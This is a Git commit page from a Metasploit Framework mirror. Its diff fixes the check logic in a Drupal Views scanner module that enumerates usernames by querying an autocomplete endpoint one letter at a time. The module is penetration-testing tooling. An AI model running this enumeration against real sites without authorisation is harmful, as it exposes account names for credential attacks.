infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3990, @wchen-r7's fix for #3984, a busted check in drupal_views_user_enum

bug/bundler_fix
Jon Hart 2014-10-12 19:38:55 -07:00
parent 458da2bca4 260aa8dc22
commit d51d2bf5a0
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 13 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
modules/auxiliary/scanner/http/drupal_views_user_enum.rb
View File

@ -35,11 +35,15 @@ class Metasploit3 < Msf::Auxiliary
register_options( register_options(
[ [
OptString.new('PATH', [true, "Drupal Path", "/"]) OptString.new('TARGETURI', [true, "Drupal Path", "/"])
], self.class) ], self.class)
end end
def check(base_uri) def base_uri
@base_uri ||= "#{normalize_uri(target_uri.path)}?q=admin/views/ajax/autocomplete/user/"
end
def check_host(ip)
res = send_request_cgi({ res = send_request_cgi({
'uri' => base_uri, 'uri' => base_uri,
'method' => 'GET', 'method' => 'GET',
@ -47,31 +51,21 @@ class Metasploit3 < Msf::Auxiliary
}, 25) }, 25)
if not res if not res
return false return Exploit::CheckCode::Unknown
elsif res and res.body =~ /\<title\>Access denied/ elsif res and res.body =~ /\<title\>Access denied/
# This probably means the Views Module actually isn't installed # This probably means the Views Module actually isn't installed
print_error("#{rhost} - Access denied") vprint_error("#{rhost} - Access denied")
return false return Exploit::CheckCode::Safe
elsif res and res.message != 'OK' or res.body != '[ ]' elsif res and res.message != 'OK' or res.body != '[ ]'
return false return Exploit::CheckCode::Safe
else else
return true return Exploit::CheckCode::Appears
end end
end end
def run_host(ip) def run_host(ip)
# Make sure the URIPATH begins with '/'
datastore['PATH'] = normalize_uri(datastore['PATH'])
# Make sure the URIPATH ends with /
if datastore['PATH'][-1,1] != '/'
datastore['PATH'] = datastore['PATH'] + '/'
end
enum_uri = datastore['PATH'] + "?q=admin/views/ajax/autocomplete/user/"
# Check if remote host is available or appears vulnerable # Check if remote host is available or appears vulnerable
if not check(enum_uri) unless check_host(ip) == Exploit::CheckCode::Appears
print_error("#{ip} does not appear to be vulnerable, will not continue") print_error("#{ip} does not appear to be vulnerable, will not continue")
return return
end end
@ -83,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("Iterating on letter: #{l}") vprint_status("Iterating on letter: #{l}")
res = send_request_cgi({ res = send_request_cgi({
'uri' => enum_uri+l, 'uri' => base_uri+l,
'method' => 'GET', 'method' => 'GET',
'headers' => { 'Connection' => 'Close' } 'headers' => { 'Connection' => 'Close' }
}, 25) }, 25)